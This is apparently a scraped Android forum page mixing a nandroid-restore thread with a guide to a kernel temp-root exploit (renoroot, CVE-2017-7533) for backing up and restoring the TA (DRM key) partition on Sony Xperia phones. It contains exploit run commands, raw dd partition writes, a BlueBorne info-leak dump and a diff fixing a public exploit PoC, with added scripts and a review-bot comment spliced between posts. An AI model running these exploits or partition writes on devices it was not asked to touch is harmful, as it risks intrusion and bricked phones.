Happy New Year! Well, sorry for being a bit unresponsive - I'm really late (and still have no time) - just a quick $ 0.02: if I'm not totally mistaken it makes a huge difference if you use custom mtd partitions. The recovery makes an image of the partitions which means on restore the same size is expected (which would also apply to your sd-ext...)
Best bet should be: make a restore with the old settings (custom mtd partitions and sd-ext) and sequentially backup the stuff in other ways than with a nandroid backup. See if it works. Alternatively you could extract the stuff out of the backup - but this might become really painful...
Hope this helps.
BTW: my problem you were referring to has been totally different as I've never been stuck on boot - I had massive random reboots - so this was another story...
heavy_metal_man said:
If you made the nandroid with a custom mtd then you had best restore it with a custom mtd. I'm not 100% sure how it's done or the theory around it though, it's been a long time since I've had to do such things.
eventcom said:
if I'm not totally mistaken it makes a huge difference if you use custom mtd partitions. The recovery makes an image of the partitions which means on restore the same size is expected (which would also apply to your sd-ext...)
Hello guys, Belated Happy New Year!!! Sorry for the late response. I was out of town and didn't have a chance to check the thread until today. I had finally got it working on 29th Dec after 15 days tearing my hair out trying to fix it.
Ah, after trying a lot of things and epic struggle finally some peace and quiet. :victory:
Thank you very much "heavy_metal_man" for your continued support and kind cooperation. I couldn't have done this without your inexhaustible support. I really appreciate it.
Thank you "eventcom" for the reply. I appreciate it. Though you were a bit late but you got it right. Probably it was the MTD thing.
I am not sure what exactly happened and what did the trick in the end. In all probability it was MTD partition thing which was messing up.
Not in case of Ext partition though. Because as I have mentioned my previous ext3 was 512 MB while now I am using 1GB Ext3 partition.
So I think Restore with old MTD settings and Ext partition >/= previous Ext partition should do the job.
Steps followed:
>Unroot and S-ON
http://forum.xda-developers.com/showthread.php?p=22832599
>Root
http://forum.xda-developers.com/showthread.php?t=1145035&nocache=1&nocache=1
>Data Wipe - Factory Reset
>Wipe Cache Partition
>Format /cache
>Format /system
>Format /data
>Wipe cache partition
>Wipe Dalvik Cache
>Create text file with custom MTD partition settings you had while taking Nandroid Backup
>Go to Recovery
>Mounts and Storage
>Format /cache
>Format /system
>Format /data
>Wipe Data / Factory Reset
>Flash "recovery-v1.5.8-Beta-CustomMTD_S.zip"
>Go to Advanced
>Reboot Recovery
>Restore Nandroid Backup
>Fix permissions
>Without restarting, flash "boot-v1.5.8-Beta-CustomMTD_S.zip"
>Reboot device
After Nandroid Restore Superuser started malfunctioning. Apps (including Titanium Backup) requiring ROOT access were not getting required permissions while it was being displayed that Superuser had granted the permissions. Anyway, was able to resolve that problem somehow and now my device is working perfectly. :victory:
Tools to backup TA partition (drm keys) of Xperia XZ1 Compact
by j4nn
https://j4nn.github.io/
As everyone knows, bootloader unlock via code from sony removes drm keys. That disables certain functions, the most critical one being the camera (outputting only solid green pictures in case of oreo fw).
I've implemented tools that allow backing up the whole TA partition, which contains the device master key needed to access sony drm keys, and restoring the TA after bootloader unlock in order to make the camera (among other things) work again on any sony stock firmware.
In order to be able to use the tools, you need to flash one of the supported firmwares (or be lucky to have the phone already running it).
In case you need to downgrade, please check this thread first.
Anybody who is about to unlock your phone, could you please do so with additional test included?
See post#500 and post#502 for more details.
Additional details in post#515, post#516, post#517 and post#527.
Instructions for the test that I kindly ask anybody who is about to unlock to do are described in the post#520 -- tested already.
Thank you.
ABOUT THE TOOLS
renosploit - rename/notify exploit to get kernelspace read/write, uses multiple vulnerabilities to overcome kaslr, pxn and pan mitigations of android oreo
renotrap - helper application (rename/notify temp root app)
renoshell - get temp root shell by use of kernel space read/write primitives provided by renosploit (sources available here)
renoroot - a shell script to be started from adb, it starts the above tools to get temp root shell
A preview video of the tools in action can be downloaded here: renoroot-preview.zip or watched online here.
As an alternative to renoroot you may use 'bindershell' to get a temp root shell for TA backup - it is available here /added on 2020-02-08/
SUPPORTED TARGETS
(with downloadable firmware links)
Sony Xperia XZ1 Compact (G8441)
47.1.A.2.324_CE1 (initial tested by @tramtrist, this release tested by @tanapoom1234 post#212)
47.1.A.8.49_CE1 (tested by @notaz post#224 and @orsonmmz post#232)
Sony Xperia XZ1 (G8341/G8343)
47.1.A.2.324_CE1 (tested by @HandyMenny post#228)
Sony Xperia XZ1 Dual (G8342)
47.1.A.2.281_CE1 (tested by @Vildanoff post#230)
Sony Xperia XZ1 (SOV36) /added on 2019-08-22/
this Japan version can be flashed with fw for G8431 making it exploitable as standard XZ1 (the possibility to use G8431 fw is confirmed here and also here)
/this confirms there might be a possibility of TA backup for few yoshino platform phone models that are possible to flash with one of the above firmwares (and boot ok even though designed for other phone variant)/
Sony Xperia XZ Premium (G8141)
47.1.A.3.254_CE1 (tested by @DocLM post#227, by @LinFan post#242 and by @steso90 xzp forum post#45)
Sony Xperia XZ Premium Dual (G8142)
47.1.A.3.254_RU (tested by @greatpatel007 xzp forum post#31 and #39)
Sony Xperia XZ Premium (G8188) /added on 2019-04-24/
this Japan version can be flashed with fw for G8141 making it exploitable as standard XZp (tested by zatsune as documented here)
/this confirms there might be a possibility of TA backup for few yoshino platform phone models that are possible to flash with one of the above firmwares (and boot ok even though designed for other phone variant)/
A word of advice: before flashing anything, enable 'OEM Unlocking' in android developer menu and if flashing a fw for different phone model, skip flashing bootloader (i.e. remove boot/ subdirectory completely before using newflasher). /added on 2019-08-27/
Please note: the temp root exploit (all renoroot tools) are designed only for the above firmware versions (binary kernels builds in them) - there is no chance it would work on other phones or other kernel builds - do not try it, it would not work.
Concerning portability to other targets, the exploit itself needs several vulnerabilities not fixed in a kernel, the primary one is CVE-2017-7533 (race between inotify and rename).
This was patched by google with 2017-12-05 security patch level. That means unless you can flash a firmware with older security patch level, it would not make sense to try to adapt the exploit for a new target (like it is a case with XZ2 Compact device for example).
USING THE TOOLS
Please follow the steps below for an official and up to date guide. If something was not clear enough, you may also check post#382 from @munted for a pdf guide with screenshots possibly containing more details and windows specific hints.
1. backup everything you need from your phone
2. flash compatible firmware
Before flashing, you may take a screenshot of service menu -> service tests -> security possibly together with current sw version screen for reference and copy them from the phone to your PC.
You can use newflasher tool from @munjeni and use instructions there to flash the firmware.
The tool should skip dangerous .ta files automatically. Just remove the persist_X-FLASH-ALL-42E5.sin file, which is discussed here, to avoid flashing it - as tested by @tanapoom1234, not flashing the persist partition allows to keep the Android Attest Key - check his post#212. /Added on 2019-04-06: The key is not part of TA obviously, it is present in the persist partition, so never flash persist even after TA backup./
/Added on 2019-04-09: When flashing a firmware, be sure to flash its bootloader too (i.e. the whole 'boot' directory needs to be present with all files in it including the .ta there). You might skip appslog, diag, Qnovo and ssd./
In case of downgrade it is needed to flash userdata (and possibly also cache) otherwise you get a boot loop.
Just backup your stuff before downgrade as with downgrade comes a factory reset. In fact I would recommend to do a factory reset just before the downgrade in order to remove the binding to your google account. This way you can avoid going online after the downgrade if used without sim and skipping wifi configuration.
3. prepare your phone
When the phone boots up, try to avoid connecting to internet by selecting only wifi and not configuring any, skipping accounts setup for later.
This may not always be possible - if persist is not flashed, android insists on setup of google account online, also starting downloads for upgrade.
Cancel everything as soon as possible and disable wifi. You may be better not using a data enabled sim card - we try to avoid any updates.
Disable auto updates of both apps and system. Change the theme from animated background to a static one.
Enable developer menu, enable adb and "Stay awake" option. A YouTube video showing the initial setup to prepare for renoroot is available here.
Take a screenshot of service menu -> service tests -> security for reference and copy it from the phone.
Again be sure both wifi and mobile data connection are disabled to avoid any background internet access.
4. install the tools
Unzip renoroot.zip (download it below). Use following adb commands to get the tools to the phone:
Code:
adb push renoroot /data/local/tmp
adb push renoshell /data/local/tmp
adb push renosploit /data/local/tmp
adb install -r renotrap.apk
5. start the tools to get a temp root shell
Use adb shell to get a command line terminal to the phone and use following commands:
Code:
cd /data/local/tmp
chmod 755 reno*
./renoroot
The last command above will start the exploit eventually resulting with a temp root shell (that should be indicated by # char before the cursor).
It may get the phone to reboot in case an overwrite does not hit the wanted shaped heap object.
You may wait few minutes after the phone boots to allow startup processes to settle down in order to avoid timing influence for next trial.
There is a video for example of this step available here.
6. backup your TA partition
When renoroot is successful, you may use following commands in the root shell to backup the trim area partition:
Code:
cd /data/local/tmp
dd if=/dev/block/bootdevice/by-name/TA of=TA-locked.img
chown shell:shell TA-locked.img
sync
sync
And then try to read it out from the phone to your PC - use another command prompt window, do not exit the root one:
Code:
adb pull /data/local/tmp/TA-locked.img
7. unlock phone's bootloader using a code from sony
When you have the TA-locked.img on your PC including screenshots, you may start the official Sony unlock procedure - follow instructions on sony website please.
Added on 2019-04-16: please note, bootloader unlocking is not reversible - it is not possible to re-lock back (restore of TA-locked does not relock the bootloader).
So be prepared to live with the boot up warning screen (can be seen for example in this video).
Again be sure you have the TA-locked.img on your PC before you start unlocking the bootloader - unlock will erase your phone, so it would get lost from /data/local/tmp if not backed up.
In case oem unlocking is grayed out (so you cannot enable it) you need to go online at least once and the option would be accessible then - video here.
After you unlock the bootloader, do not flash anything - just boot the same unmodified fw we used for the temp root.
8. get temp root again to restore TA
Use the same instructions to avoid internet access and updates as described above, configure the few above mentioned options and start renoroot as before.
With the temp root shell, backup the unlocked TA (for future comparisons) and then restore the state from the locked one. You may need to adb push the TA-locked.img back to /data/local/tmp as the unlock erased everything.
Code:
cd /data/local/tmp
dd if=/dev/block/bootdevice/by-name/TA of=TA-unlocked.img
chown shell:shell TA-unlocked.img
sync
sync
And then try to read it out from the phone to your PC (and transfer the locked TA back to the phone) - use another command prompt window, do not exit the root one:
Code:
adb pull /data/local/tmp/TA-unlocked.img
adb push TA-locked.img /data/local/tmp
And using the window with renoshell temp root shell, restore the TA:
Code:
cd /data/local/tmp
dd if=TA-locked.img of=/dev/block/bootdevice/by-name/TA
sync
sync
9. boot up the phone with the current fw and see about the camera if it works or not
You may also document the security screen state by taking a screenshot. Do not forget to transfer it from the phone to PC.
10. flash twrp recovery
Updated on 2019-08-08: please see post#1029 for the latest workflow with the kernels hiding bootloader unlock status.
Updated on 2019-02-10:
Instead of flashing twrp, you may just 'fastboot boot' it if you need it.
Instead of the steps 10. to 13., you may use patched and rooted kernel hiding bootloader unlock available in following forum threads in order to be able to even install FOTA system update
[XZ1c] rooted kernel hiding bootloader unlock with working fota
[XZ1] rooted kernel hiding bootloader unlock with working fota
[XZp] rooted kernel hiding bootloader unlock with working fota
giving you back sony drm functionality that fw disables when it detects unlocked bootloader status. For more details see also post#645 of this thread.
11. OPTIONAL step (only for XZ1c maybe XZ1)
This step is optional and only lightly tested. The idea is that secd detects unlocked bootloader and switches to limited mode even though drm keys are available. This can be seen in the adb logcat with following message:
Code:
E secd : secd_backend_credential_manager.cpp:77 the bootloader is unlocked, use limited functionality
To workaround that, we may use a secd ripped from secd extension by modpunk - just flash attached secd-ignore-unlock.zip at bottom of this post via twrp recovery (do not flash the 'secd extension by modpunk' which is linked here only for reference).
I've analysed, what changes were done in the secd. Also the lib which fixes the missing device key in TA is not needed from the modpunk's package as we have the real valid key there, so I've removed the lib (and the script which would preload it). Therefore it is just about making secd think that bootloader was not unlocked. Thanks to @modpunk for the patched secd and @russel5 for the flashable zip on which the secd-ignore-unlock.zip is based on.
With this, sony updates may start to arrive.
Please note, this would make sony think the phone runs unmodified and still locked fw. OTA updates may restore original secd or fail altogether (due to modified system/vendor/... partitions).
You may boot the phone to see what happens (OTA updates?) - edit: OTA updates did come, but install to be done on reboot failed - tested by @Unbounded, see post#43 and #44 of the attest key thread please - this may confirm the availability of the SOMC Attest Key which may be the key needed to get sony ota updates (just a guess, not sure what exactly this key is used for).
Again, this step is optional and very experimental, maybe better not to apply it (camera works without this step on any stock fw without any change /until sony changes that in some update/).
Update: see post#395 for secd_ignore_unlock for XZ1c for pie from @S-trace - thank you. It works with XZ1 too (see post#396). The patch port for XZp pie is here: attest key thread post#67.
In my opinion all these secd patch variants are hiding the unlocked state only partially. There are other components in the fw that ask about the unlock state. A proper solution for this is the unlock hiding patched kernel linked in the step 10. of this howto.
12. flash a recent stock firmware
In case you wanted the patched secd, flash it again over the flashed fw.
Boot the phone, check functionality, take screenshots.
13. install magisk if rooted phone is what you need ;-)
Follow instructions of latest magisk, it should work without any special actions.
AUTOMATED FULL BACKUP
These are experimental tools (and actually seem not to work in some cases getting truncated files that are useless) to extract most of the partitions from the phone after getting a temp root. It can be used for comparisons/analysis of what unlock changes (download backup-tools.zip at bottom of this post).
You would run backup-setup.bat in windows command prompt first (you may need to adjust the PATH setting to find adb properly) to copy the tools to the phone and setup tcp forwarding for netcat based copying.
Then using adb shell you would do:
Code:
cd /data/local/tmp
./backup-send.sh
and in windows command prompt you would start:
Code:
backup-recv.bat bk-unlocked
and partitions images would be extracted from the phone (for larger ones sparse android image format is used).
Full depth comparison could be achieved by use of these backup tools (obviously needs to be done twice - before and after unlock, changing the target directory name argument of backup-recv.bat).
WHAT WORKS
Here is a quote of post#185 from @tramtrist in this thread describing the results of the initial tests - special thanks to him!
tramtrist said:
I'd like to report in real quick on what's working.
After following @j4nn very clear instructions and backing up/restoring my TA keys I was left with the NOT PROVISIONED messages he mentioned earlier. However this seems to be no problem as after TA-restore my camera works as it did before. I'm also able to use WIDEVINE sites which require that key as well.
After restoring TA I went ahead and flashed the latest UK customized firmware
I then flashed TWRP latest version 3.2.3
I wanted to have root so I flashed Magisk 1.73 and safety net worked without me having to do anything special.
Google Pay could be set up and seems to be using my credit cards just fine.
I didn't flash any custom kernel as stock is just fine for me.
Adaway is working with root without issue.
All-in-all if you follow @j4nn instructions when he's ready to fully release them to the public then I'd say you will be in good shape.
I'd like to thank @j4nn for giving me the chance to finally contribute something concrete to this community. If you're gonna use this you should drop him some cash.
Update: if you follow the links added in step 10. and use "rooted kernel hiding bootloader unlock", it seems you can have all functionality restored including fota system updates while having magisk root with passed safetynet cts. Verified by @notaz in post#14 of the "[XZ1c] rooted kernel hiding bootloader unlock" thread. Thanks.
ACKNOWLEDGEMENTS
Many thanks to following users:
@moofesr - for testing initial kernel builds until proper build procedure had been found, special thanks for his patience when all tests resulted with bootloop
@Raz0Rfail and @moofesr - for testing timing of rename/notify vulnerability with patched kernel
@dosomder (aka zxz0O0) - for his iovyroot
@tramtrist - for initial testing of TA backup, unlock and restore, special thanks for exposing to risk of losing drm if it did not work
@tonsofquestions - for a lot of testing with unlocked-ta-restored phone when I did not have an unlocked phone yet
ThomasKing (not a user on xda) - for his black hat ksma presentation
few other users in this and attest key lost thread here on xda - for some other cve possibilities, ideas and specific tests
DONATIONS
Please note: I had to invest an enormous amount of time (as you can see throughout this thread and also summarized in progress/change log in post#2) to develop these tools, the code is extremely complex (more than 9000 lines of source code) and it was unbelievably hard to debug and get the timing usable.
It would be kind of you if you could consider donating here please:
https://j4nn.github.io/donate/
I would be happy to accept any donation to me as a form of gratitude in case the software helped you to backup your TA (drm keys) before bootloader unlocking.
Thanks.
DOWNLOAD THE TOOLS
See the attached renoroot.zip at bottom of this post.
Please post your experience with using the tools, if it worked and on which phone model (and fw in case of xz1c).
You may include info about how long it took to get a root shell, how many reboots, how many events in the last trial which succeeded with how many overwrites (just one with success is the best, more means previous overwrites did not hit wanted object in shaped heap resulting with possibly unstable system). This info is interesting for statistics, so we all know, how fast can we get a temp root on each device/firmware.
Thanks.
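A host-side sanity check for the pulled TA images, added here as an example and not part of j4nn's tools or post: since the bootloader unlock is irreversible and the post notes that dumps can come out truncated, it checks TA-locked.img before you proceed and counts the bytes that differ between the locked and unlocked dumps. The function names, return codes and the 512-byte alignment test are assumptions of this example; the device-side hash would come from running sha256sum on the image in the root shell, if the firmware provides that command.

```shell
#!/bin/sh
# Added example: host-side checks for TA images pulled with adb.
# File names follow the post (TA-locked.img, TA-unlocked.img); everything
# else (function names, return codes, 512-byte check) is hypothetical.

# Print the SHA-256 of a file as bare hex.
ta_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# ta_check IMAGE [DEVICE_SHA256]
# Returns 0 when the image looks like a complete partition dump, otherwise:
#   1 = missing or empty file
#   2 = size is not a multiple of 512 bytes (dump was cut short)
#   3 = every byte is identical (blank dump, e.g. all 0x00 or all 0xFF)
#   4 = hash differs from the one computed on the device
ta_check() {
    img=$1
    want=${2:-}
    [ -s "$img" ] || return 1
    size=$(wc -c < "$img" | tr -d ' ')
    [ $((size % 512)) -eq 0 ] || return 2
    # Count distinct byte values; a blank dump collapses to exactly one.
    distinct=$(od -An -v -tx1 "$img" | tr -s ' ' '\n' | grep -v '^$' \
        | sort -u | wc -l | tr -d ' ')
    [ "$distinct" -gt 1 ] || return 3
    if [ -n "$want" ]; then
        [ "$(ta_sha256 "$img")" = "$want" ] || return 4
    fi
    return 0
}

# ta_diff_bytes A B
# Prints how many byte positions differ between two dumps of equal size,
# for the locked-versus-unlocked comparison. Returns 1 if the sizes differ,
# because one of the dumps is then incomplete.
ta_diff_bytes() {
    [ "$(wc -c < "$1" | tr -d ' ')" = "$(wc -c < "$2" | tr -d ' ')" ] || return 1
    cmp -l "$1" "$2" | wc -l | tr -d ' '
}
```

Run `ta_check TA-locked.img <hash printed on the phone>` right after the adb pull and continue to the unlock step only when it returns 0.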
DEVELOPMENT PROGRESS / CHANGE LOG
26-05-2018 started this thread listing vulnerabilities found during many weeks of research done right after buy of my XZ1c phone
06-06-2018 post#7: managed to boot kernel from the 47.1.A.2.281 fw in qemu
16-06-2018 post#25: simple out of bounds overwrite not useful, complex exploiting of use after free needed
02-07-2018 post#33: explained how use after free exploit would work, but timing is impossible: kfree from rcu too late
06-07-2018 post#44 and post#48: more details about exploiting use after free and kfree_rcu too late kfree timing problem
17-07-2018 post#53: first kernel to test timing, did not boot when tried with unlocked xz1c
27-07-2018 post#73: solved the problem with delayed kfree from kfree_rcu, basic inotify/rename proof of concept running in qemu for long filenames
27-07-2018 post#75: found a way to build xz1c kernel from source which can be booted on unlocked xz1c, confirmed the delayed kfree from rcu timing problem
11-08-2018 post#88: extensive testing of timing
20-08-2018 post#104: inotify/rename exploit now works with long filenames, allowing kernel heap (256 bytes slub unit) overflow, overview of next phases of the exploit yet to be implemented
31-08-2018 post#118: implemented mostly arbitrary kernel write _together_ with mostly arbitrary kernel read, first bypass of KASLR but we need to bypass PXN & PAN too
15-09-2018 post#131: found that we will need ROP/JOP gadgets to overcome PXN & PAN oreo mitigations, more details in post#135
22-09-2018 post#137: first arbitrary kernel space read and write proof of concept working in qemu
22-09-2018 post#138: with great timing luck kernel space R/W poc worked on still locked xz1c
05-10-2018 post#146: first backup of my xz1c locked TA done: asking for an unlock-and-TA-restore test volunteer
07-10-2018 post#151: confirmed that BL unlock removed 66667 unit - device master key?
18-10-2018 post#162: exploit not reliable enough for public use yet
22-10-2018 post#165: renoroot preview video, send initial test version to @tramtrist
22-10-2018 post#168: renoroot initial test results - after TA restore camera works, BL remains unlocked
25-10-2018 post#185: more initial test results directly from @tramtrist
28-10-2018 post#199: researched possible uses of various keys from security service menu
03-11-2018 post#206: renoroot temp root including tools and howto for TA partition (drm keys) backup released, put everything on the first page
05-11-2018 post#235: renoroot confirmed working with other phone models
10-11-2018 post#287: ordered a new xz1c just for testing and development work
18-11-2018 post#348: the new xz1c arrived
22-11-2018 post#372: a persistent root from a temp root possibility - but not with selinux
11-12-2018 post#428: possibly the fastest temp root - 6.03 seconds with just 53 events and 1 overwrite
05-01-2019 post#493: explained about TA restore not re-locking bootloader - good for us!
09-01-2019 post#515: intercept BL unlock of xz1c in the middle of the procedure
10-01-2019 post#516: posted few videos to highlight key points when preparing for unlock with backup of TA via renoroot temproot
10-01-2019 post#517: video showing xz1c bl unlock with twrp booted in the middle
11-01-2019 post#520: howto for unlock with the twrp booted in the middle
19-01-2019 post#602: info about test to write dev master key TA unit from the secd process
30-01-2019 post#620: info about TA restore and various drm keys
02-02-2019 post#623: preview of FOTA system update fully installed with unlocked and rooted XZ1c - it confirms all functionality of a locked phone have been restored
05-02-2019 post#633: tested fota system update from oreo to pie - posted a video
10-02-2019 post#645: kernels hiding bootloader unlock released for XZ1c/XZ1/XZp - with locked TA restored this brings root with all locked phone functionality of stock fw restored
16-02-2019 post#652: ported BL unlock hiding patch to TAMA platform for testing with XZ2 (it worked, but cannot be booted via fastboot due to bug in bootloader according to sony /more details here/)
19-02-2019 post#663: patched XZ2 kernel to make it boot via 'fastboot boot' command from usb (tested successfully by @serajr post#664) - shall be useful for twrp setup on TAMA platform (post#668 by @MartinX3)
19-02-2019 post#672: fota system update with my rooted kernels verified with XZ2 phone by @serajr - so we may have fota system update with root on xz2/xz2c/xz2p/xz3 phones too (theoretically)
---->> moved the original opening post in here ----
Downgrade XZ1 Compact to 47.1.A.2.281 firmware version (not sure if this downgrade is safe, see android-attest-key-lost thread here please). The 47.1.A.2.324_CE1 version might be better to try first.
The 2.281 fw results with android security patch level 2017-08-05, kernel 4.4.74, android oreo.
BlueBorne vulnerabilities are not patched yet with this firmware:
CVE-2017-0785 Android information leak vulnerability PoC seems to work - tested myself.
Not sure, but it seems that bluetooth service is not a 32bit process anymore, contrary to the note in BlueBorne whitepaper /The Bluetooth service in Android runs under Zygote (Android service manager), and is surprisingly a 32-bit process (even when the OS and CPU are ARM-64 for instance/ - example of stack dump obtained:
Code:
000000b0 00 00 00 00 ff ff ff fd ff ff ff ff d8 69 f4 80 │····│····│····│·i··│
000000c0 00 00 00 73 e8 60 0c 10 00 00 00 73 e8 60 01 40 │···s│·`··│···s│·`·@│
000000d0 00 00 00 73 d8 6b 20 08 00 00 00 73 e8 69 06 d0 │···s│·k ·│···s│·i··│
...
000007e0 00 00 00 73 2c 32 34 38 72 68 74 20 20 64 61 65 │···s│,248│rht │ dae│
000007f0 65 6d 61 6e 5f 74 62 20 6b 72 6f 77 75 65 75 71 │eman│_tb │krow│ueuq│
00000800 74 73 20 65 65 74 72 61 00 00 00 64 00 00 00 00 │ts e│etra│···d│····│
Those '00 00 00 73' are often present, quite possibly the upper 32bit part of a 64bit pointer. The text at 7e8 may be something like 'thread name bt_workqueue started', possibly indicating the CVE-2017-0785 PoC worked (modified so that 'n = 90' to receive more data).
The first idea was to make the Android BlueBorne exploit working to obtain bluetooth service credentials and use that with some kernel exploit to switch to root in order to finally do TA partition backup (to save DRM keys).
The bluetooth user seems to have the NET_ADMIN capability, that could be very useful.
I've researched further possible kernel exploits and it seems to me that the kernel from 2.281 firmware seems to contain (at least) following vulnerabilities:
CVE-2017-7308 AF_PACKET packet_set_ring
This needs NET_RAW capability, that may be hard to obtain, bluetooth service seems not to have it.
CVE-2017-7533 race between inotify_handle_event() and vfs_rename()
https://exploit.kitploit.com/2017/08/linux-kernel-412-race-condition.html
This may work as a standalone exploit - checked the kernel source - vulnerability is not fixed, not sure about SElinux limitations and other android security mitigations - please discuss this.
Found only demo poc not getting root, but it may be possibly developed to full temp root standalone exploit.
This currently seems to be the most promising.
CVE-2017-1000112 memory corruption in UDP fragmentation offload
https://securingtomorrow.mcafee.com...vilege-escalation-analyzing-cve-2017-1000112/
https://ricklarabee.blogspot.cz/2017/12/adapting-poc-for-cve-2017-1000112-to.html
https://www.exploit-db.com/exploits/43418/
This could be used after BlueBorne done, as it needs NET_ADMIN capability.
HELP NEEDED PLEASE - let's collaborate and develop together the needed exploits!
For example it is hard for me to develop only with a locked device, better debugging may be possible on stock firmware with unlocked bootloader as some modifications may be flashed. My free time is quite limited, so it would be useful to split the work.
----<< moved the original opening post in here ----
It seems that 'CVE-2017-7533 race between inotify_handle_event() and vfs_rename()' is not possible to trigger from adb shell - possibly some android security mitigations/selinux limitation?
Built exploit.c from CVE-2017-7533 with the attached android makefiles (CVE-2017-7533-android-build.tar.gz), adb pushed to /data/local/tmp:
Code:
G8441:/ $ uname -a
Linux localhost 4.4.74-perf+ #1 SMP PREEMPT Wed Aug 9 16:09:57 2017 aarch64
G8441:/ $ cd /data/local/tmp
G8441:/data/local/tmp $ ./exploit 2>err.log
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����test_dir/bbbb3210321032103210"
alloc_len : 50
callrename done.
G8441:/data/local/tmp $
the notify events seem not to be received
The rename function works in the exploit (tested separately), but many errors such as
rename1: No such file or directory
rename2: No such file or directory
are returned from the exploit though.
The inotify_init1 function returns valid fd, so it looks like everything is ok, but for unknown reason, inotify events are not received.
Running the same code in linux with vulnerable kernel results with this:
Code:
Linux 4.8.0 #1 SMP Tue Oct 25 09:09:01 UTC 2016 x86_64 Intel(R) Core(TM) i5-2500K CPU @ 3.30GHz GenuineIntel GNU/Linux
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100ÿÿ1ÿÿÿÿ"
handle_events() event->name : bbbb32103210321032100ÿÿ1ÿÿÿÿ, event->len : 32
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
callrename done.
alloc_len : 50
Note the 'handle_events' log message presence - that indicates receive of inotify event. The rename errors are not returned in this case.
That means even though the kernel is vulnerable (as verified in sony release source code - it is fixed since 47.1.A.12.34 version as can be seen with 'git log --stat -p origin/47.1.A.12.xxx -- fs/dcache.c' in sony's kernel git repository), it looks like we cannot trigger the bug simply from adb shell.
This is what is configured in the kernel (using sony's build instructions):
CONFIG_FSNOTIFY=y
CONFIG_DNOTIFY=y
CONFIG_INOTIFY_USER=y
# CONFIG_FANOTIFY is not set
Am I missing something? Any idea why the bug cannot be triggered?
--previous edit-- 27-05-2018 at 22:58. Reason: added info about rename() on xz1c; added info about inotify_init1() on xz1c; added info about 1st fw version with a fix and relevant kernel config options
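The reading of the stack dump in the opening post above can be checked mechanically. The following Python is an added example, not code from the thread: it assumes the dump tool printed every 32-bit word most significant byte first over little-endian AArch64 memory and that user addresses fit in 39 bits; the function names are made up for this illustration.

```python
import re

# Hex columns of the six dump rows quoted in the post; the rows behind its
# "..." line are not on the page and are not filled in here.
DUMP = """\
000000b0 00 00 00 00 ff ff ff fd ff ff ff ff d8 69 f4 80
000000c0 00 00 00 73 e8 60 0c 10 00 00 00 73 e8 60 01 40
000000d0 00 00 00 73 d8 6b 20 08 00 00 00 73 e8 69 06 d0
000007e0 00 00 00 73 2c 32 34 38 72 68 74 20 20 64 61 65
000007f0 65 6d 61 6e 5f 74 62 20 6b 72 6f 77 75 65 75 71
00000800 74 73 20 65 65 74 72 61 00 00 00 64 00 00 00 00
"""

# Offset plus exactly 16 byte columns; a trailing ASCII column is ignored.
ROW = re.compile(r"^([0-9a-f]{8})((?: [0-9a-f]{2}){16})", re.M)
USER_VA_BITS = 39  # assumption: 39-bit user address space on this arm64 build


def memory_runs(text):
    """Return [(start_offset, bytes)] with the bytes put back in memory order.

    Assumption: each 32-bit word was printed most significant byte first, so
    every group of four displayed bytes is reversed. Adjacent rows are joined.
    """
    runs = []
    for m in ROW.finditer(text):
        off = int(m.group(1), 16)
        shown = bytes.fromhex(m.group(2))
        mem = b"".join(shown[i:i + 4][::-1] for i in range(0, 16, 4))
        if runs and runs[-1][0] + len(runs[-1][1]) == off:
            runs[-1] = (runs[-1][0], runs[-1][1] + mem)
        else:
            runs.append((off, mem))
    return runs


def ascii_strings(start, mem, min_len=8):
    """Printable-ASCII runs of at least min_len bytes, as (offset, text)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [(start + m.start(), m.group().decode("ascii"))
            for m in re.finditer(pattern, mem)]


def pointer_candidates(start, mem, phase, strings):
    """64-bit little-endian values at offsets == phase (mod 8) that lie in the
    user address range and do not overlap an already decoded string."""
    busy = [(off, off + len(text)) for off, text in strings]
    found = []
    for i in range((phase - start) % 8, len(mem) - 7, 8):
        off = start + i
        if any(off < end and off + 8 > begin for begin, end in busy):
            continue  # text bytes can look like a small pointer; skip them
        value = int.from_bytes(mem[i:i + 8], "little")
        if (1 << 32) <= value < (1 << USER_VA_BITS):
            found.append((off, value))
    return found


def analyse(text):
    """Decode strings, then keep the 8-byte alignment that yields most pointers."""
    runs = memory_runs(text)
    strings = [s for off, mem in runs for s in ascii_strings(off, mem)]
    by_phase = {
        phase: [c for off, mem in runs
                for c in pointer_candidates(off, mem, phase, strings)]
        for phase in (0, 4)
    }
    phase = max(by_phase, key=lambda p: len(by_phase[p]))
    return strings, phase, by_phase[phase]


if __name__ == "__main__":
    strings, phase, pointers = analyse(DUMP)
    for off, text in strings:
        print(f"string  @0x{off:04x}: {text!r}")
    print(f"64-bit values start at dump offsets == {phase} (mod 8)")
    for off, value in pointers:
        print(f"pointer @0x{off:04x}: 0x{value:016x}")
```

Every pointer-sized value it recovers has 0x73 as its upper word, which is what a 64-bit process would leak, and the text decodes to the 'thread name bt_workqueue started' message the post guessed at. The 64-bit values begin 4 bytes off the dump's own 8-byte boundaries, so the dump offsets are not the stack's alignment.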
It doesn't trigger because the exploit itself is broken:
Code:
@@ -280,7 +280,7 @@ void *callrename( void *ptr )
char enter = 0;
char origname[1024];
char longname[1024];
- char next_ptr[8] = "\x30\xff\xff\x31\xff\xff\xff\xff";
+ char next_ptr[9] = "\x30\xff\xff\x31\xff\xff\xff\xff";
char prev_ptr[8] = "";
// This value will overwrite the next (struct fsnotify_event)event->list.next
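Review bot: on the added next_ptr[9] line the array size is still counted by hand against an 8-byte literal, so the terminating NUL is present only because 9 happens to be the literal length plus one. Declaring it as char next_ptr[] = "..." lets the compiler size the array with the terminator included and keeps the two from drifting apart if the bytes are edited later. The removed [8] form is legal C but leaves the array unterminated, which is consistent with the extra test_dir/bbbb... text that follows the pointer bytes in the longname output of the G8441 run earlier in the thread; a one-line comment that the array is consumed as a C string would document why the extra byte matters.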
With that it should work (not tested though).
Elevating through heap/slab overflow is not going to be straightforward though. As the redhat description states, we could redirect the free list pointer to userspace and provoke the kernel to put some function pointers there for us to modify, but as soon as a context switch happens the system will crash and burn. I guess easiest way would be to combine this with some older heap overflow exploit, assuming such thing exists (haven't looked)...
Thanks, your change really made it work:
Code:
G8441:/data/local/tmp $ ./exploit
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����"
